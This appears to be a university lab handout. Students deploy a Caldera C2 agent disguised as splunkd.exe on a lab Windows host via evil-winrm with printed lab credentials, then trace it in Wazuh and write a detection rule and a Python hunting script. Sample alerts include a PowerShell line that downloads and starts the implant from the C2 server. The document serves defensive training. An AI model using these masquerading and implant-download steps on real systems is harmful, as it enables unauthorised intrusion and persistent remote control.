Malware Lab

Introduction

In this lab you will use the adversary emulation framework Caldera together with the Wazuh SIEM: you will deploy a piece of malware (a Caldera agent) on a victim machine and then trace the malware's execution in the SIEM's alerts.

NOTE: This lab can only be done in the EduSOC on campus.

Pre-requisites

  • A Kali Linux VM

Deploying Malware

Generating payload

The first step is generating some malware; in our case it will be a Caldera agent.

To access Caldera, navigate to https://caldera.soc.local

Once prompted for a login, enter the following credentials:

  • Username: admin
  • Password: admin

Once logged in you should see the Caldera dashboard.

Caldera dashboard

\newpage

From here, navigate to the Agents tab in the left column.

Agents tab

Then click Deploy an agent > Sandcat > Windows.

Sandcat is the default Caldera implant. It is written in Go and runs on Windows, Linux and macOS.

Agent configuration

  • agent.contact.http: The address the agent will report back to, i.e. its command-and-control (C2) server. This should always be the address of our Caldera server; by default it is already set correctly.
  • agents.implant_name: The file name the agent will have on the victim machine. By default it is splunkd.exe, so that the process looks like Splunk's legitimate daemon of the same name.
  • agent.extensions: An optional field for adding extra features to the agent. We won't need it, so leave it empty.

Now copy the generated payload command. It is a PowerShell command that drops the agent on the victim under the implant name and starts it; you will paste it on the victim machine in the next step.

Installing Agent on Victim

The victim machine will be the winterfell machine on the GOAD network.

In a Kali terminal, access the victim machine with the following command:

evil-winrm -u robb.stark -p sexywolfy -i 10.8.10.11

This gives us a shell as the user robb.stark. Note that the shell is remote: the commands you type travel over WinRM and are executed by a Windows process on winterfell, which matters when you later look for the malware's parent process.

Shell on user

Here, paste the payload command from the previous step.

Running payload

The deployment succeeded if no errors are printed and your agent appears in the Agents tab in Caldera (it may take a few seconds to beacon in for the first time).

Agents list

Analyzing Malware Execution in Wazuh SIEM

Accessing Wazuh

Now that we have deployed the Caldera agent on the victim machine, we need to analyze the security events generated by this malware execution.

Navigate to the Wazuh SIEM at https://wazuh.soc.local

Log in with the credentials provided by your instructor.

Once logged in, you should see the Wazuh dashboard.

Threat Hunting

From the main dashboard, navigate to the Threat Hunting tab.

Threat Hunting tab

And then go to the Events tab.

Events tab

Here you will see a timeline of security events captured by Wazuh agents running on monitored systems.

Identifying Malware Execution Events

To find events related to our Caldera agent execution, you need to:

  1. Press Add filter and fill it out with the following:

    • Field: agent.name
    • Operator: is
    • Value: winterfell

Agent filter

  2. Look for suspicious events. The Sysmon event ID is in the field data.win.system.eventID (1 = process creation, 3 = network connection, 11 = file creation). Search for events related to:

    • PowerShell execution (our payload was a PowerShell command)
    • Process creation of splunkd.exe (or whatever implant name you configured)
    • Network connections to the Caldera server IP 192.168.251.11
    • File creation events in user directories
  3. Key indicators to look for:

    • Suspicious executions of PowerShell
    • The creation of splunkd.exe in an unusual location (not the legitimate Splunk installation path)
    • Network connections from splunkd.exe to external/unusual IP addresses

Questions to answer:

  • What is the legitimate process that was abused to spawn the malware?

\vspace{3cm}

  • What is the full command line of the agent's execution?

\vspace{3cm}

  • What network connections did the malware establish?

\vspace{3cm}

  • What is the first command the agent executed automatically?

\vspace{3cm}

Take screenshots of the relevant events and document the Sysmon Event IDs and the Wazuh rule IDs that triggered.

Writing a Wazuh Detection Rule

Now that you’ve identified the indicators of compromise (IOCs), you will create a custom Wazuh rule to detect similar malware executions in the future.

Understanding the Event Structure

First, examine one of the events you identified. Click on the event to expand its details and review the JSON structure. Pay attention to:

  • data.win.system.eventID: The Sysmon event ID (1 = process creation, 3 = network connection, 11 = file creation)
  • data.win.eventdata.commandLine: The command that was executed
  • data.win.eventdata.image: The process that was created (full path of the executable)
  • data.win.eventdata.parentImage: The parent process
  • data.win.eventdata.destinationIp: The remote address, for network connection events
  • rule.id: The current rule that triggered (if any)

Note that inside a rule the field names are written without the data. prefix, e.g. win.eventdata.image.

Creating the Custom Rule

Navigate to Server Management -> Rules in the left sidebar.

Rules tab

Click on Add new rules file, give the file a name ending in .xml (any name will do, for example caldera_rules.xml) and paste the rule below into it.

New rules file

<group name="sysmon,sysmon_event3,caldera,malware,c2_communication,">
  <!-- Detect a masqueraded splunkd.exe making a network connection (Sysmon Event ID 3).
       Rule 100210 is the parent rule this one builds on. It is not shown on this page and is
       assumed to match Sysmon Event ID 3 logs from the Windows agents. Custom rule IDs must be
       in the 100000 to 120000 range reserved for local rules. -->
  <rule id="100212" level="15">
    <if_sid>100210</if_sid>
    <!-- The process name ends in \splunkd.exe (case-insensitive)... -->
    <field name="win.eventdata.image" type="pcre2">(?i)\\splunkd\.exe$</field>
    <!-- ...but it does not live under the Splunk install path, the only place a real splunkd.exe
         belongs (both Splunk Enterprise and the Universal Forwarder install under
         C:\Program Files\Splunk*). The rule does not check the destination: it fires on any
         connection by a misplaced splunkd.exe, which generalises beyond this lab. To pin the
         lab's C2 address, add a third field on win.eventdata.destinationIp. -->
    <field name="win.eventdata.image" type="pcre2" negate="yes">(?i)C:\\Program Files\\Splunk</field>
    <description>Caldera Sandcat agent C2 communication: Masqueraded splunkd.exe connecting to 192.168.251.11</description>
    <mitre>
      <id>T1071</id>
      <id>T1095</id>
      <id>T1571</id>
      <id>T1036.005</id>
    </mitre>
  </rule>
</group>

Save the file and restart the manager when the dashboard prompts you; the new rule is not loaded until then. Then verify it: paste the raw JSON of one of the splunkd.exe network connection events you found earlier into the dashboard's Ruleset Test tool (wazuh-logtest) and check that rule 100212 is the one that fires, at level 15.
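As an added example (not part of the lab's own materials), here is the hunting checklist from the Threat Hunting section and the logic of rule 100212 rendered in Python and run over a few constructed Wazuh alert records, so you can see which records each indicator selects and which a genuine Splunk forwarder does not trigger. The alert records, paths and command lines are invented for the example; only the field names follow Wazuh's Windows eventchannel decoder (data.win.system.eventID, data.win.eventdata.image and friends).

```python
import re
from typing import Optional

SYSMON_CHANNEL = "Microsoft-Windows-Sysmon/Operational"
CALDERA_IP = "192.168.251.11"  # the lab's Caldera server, from the hunting checklist

# The two conditions of rule 100212 as Python regexes: the process calls itself
# splunkd.exe, but it is not under C:\Program Files\Splunk* where a real one lives.
IMPLANT_NAME = re.compile(r"(?i)\\splunkd\.exe$")
LEGIT_SPLUNK_PATH = re.compile(r"(?i)C:\\Program Files\\Splunk")
POWERSHELL = re.compile(r"(?i)\\(powershell(_ise)?|pwsh)\.exe$")


def is_masqueraded_splunkd(image: str) -> bool:
    """True when an image path is named splunkd.exe but sits outside the Splunk install path."""
    return bool(IMPLANT_NAME.search(image)) and not LEGIT_SPLUNK_PATH.search(image)


def rule_100212_matches(alert: dict, c2_ip: Optional[str] = None) -> bool:
    """Python rendering of the Wazuh rule: a Sysmon Event 3 (network connection) whose
    image is a masqueraded splunkd.exe. The XML rule does not check the destination;
    pass c2_ip to pin it additionally, as a destinationIp field in the rule would."""
    win = alert.get("data", {}).get("win", {})
    system, ev = win.get("system", {}), win.get("eventdata", {})
    if system.get("channel") != SYSMON_CHANNEL or system.get("eventID") != "3":
        return False
    if not is_masqueraded_splunkd(ev.get("image", "")):
        return False
    return c2_ip is None or ev.get("destinationIp") == c2_ip


def hunt(alerts: list, agent_name: str) -> dict:
    """Apply the hunting checklist to one agent's alerts. Returns the matching
    events grouped by indicator, each summarised as a short string."""
    hits = {"powershell_exec": [], "implant_file_created": [],
            "implant_process": [], "c2_connection": []}
    for alert in alerts:
        if alert.get("agent", {}).get("name") != agent_name:
            continue  # the agent.name filter from step 1
        win = alert.get("data", {}).get("win", {})
        system, ev = win.get("system", {}), win.get("eventdata", {})
        if system.get("channel") != SYSMON_CHANNEL:
            continue
        eid, image = system.get("eventID"), ev.get("image", "")
        if eid == "1" and POWERSHELL.search(image):  # Sysmon 1: process creation
            hits["powershell_exec"].append(ev.get("commandLine", ""))
        if eid == "1" and is_masqueraded_splunkd(image):
            hits["implant_process"].append(f"{ev.get('parentImage')} -> {ev.get('commandLine')}")
        if eid == "11" and is_masqueraded_splunkd(ev.get("targetFilename", "")):  # Sysmon 11: file create
            hits["implant_file_created"].append(f"{ev['targetFilename']} written by {image}")
        if rule_100212_matches(alert):  # Sysmon 3: network connection
            hits["c2_connection"].append(f"{image} -> {ev.get('destinationIp')}:{ev.get('destinationPort')}")
    return hits


def _sysmon(agent: str, event_id: str, **eventdata: str) -> dict:
    """Build a minimal Wazuh alert record with just the Sysmon fields used above."""
    return {"agent": {"name": agent},
            "data": {"win": {"system": {"channel": SYSMON_CHANNEL, "eventID": event_id},
                             "eventdata": eventdata}}}


# Constructed sample alerts, invented for this example (not captured from the lab).
SAMPLE_ALERTS = [
    # a PowerShell process starting on the victim
    _sysmon("winterfell", "1",
            image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            parentImage=r"C:\Windows\System32\wsmprovhost.exe",
            commandLine=r"powershell.exe -ep bypass -c Invoke-WebRequest http://192.168.251.11:8888/file/download -OutFile C:\Users\Public\splunkd.exe"),
    # the implant being written to a user-writable directory
    _sysmon("winterfell", "11",
            image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            targetFilename=r"C:\Users\Public\splunkd.exe"),
    # the implant being started
    _sysmon("winterfell", "1",
            image=r"C:\Users\Public\splunkd.exe",
            parentImage=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            commandLine=r"C:\Users\Public\splunkd.exe -server http://192.168.251.11:8888 -group red"),
    # the implant beaconing to the Caldera server
    _sysmon("winterfell", "3",
            image=r"C:\Users\Public\splunkd.exe",
            destinationIp=CALDERA_IP, destinationPort="8888"),
    # a genuine Splunk forwarder talking to an indexer: must not match
    _sysmon("winterfell", "3",
            image=r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe",
            destinationIp="10.8.10.50", destinationPort="9997"),
    # the same implant on another GOAD host: excluded by the agent.name filter
    _sysmon("kingslanding", "3",
            image=r"C:\Users\Public\splunkd.exe",
            destinationIp=CALDERA_IP, destinationPort="8888"),
]

if __name__ == "__main__":
    for indicator, events in hunt(SAMPLE_ALERTS, "winterfell").items():
        print(indicator, events)
```

Running it lists one hit per indicator for winterfell; the forwarder's connection is rejected by the negated path check, and the kingslanding record only shows up if you hunt that agent instead. Use is_masqueraded_splunkd to sanity-check any image path from your real alerts before you rely on the rule's two regexes.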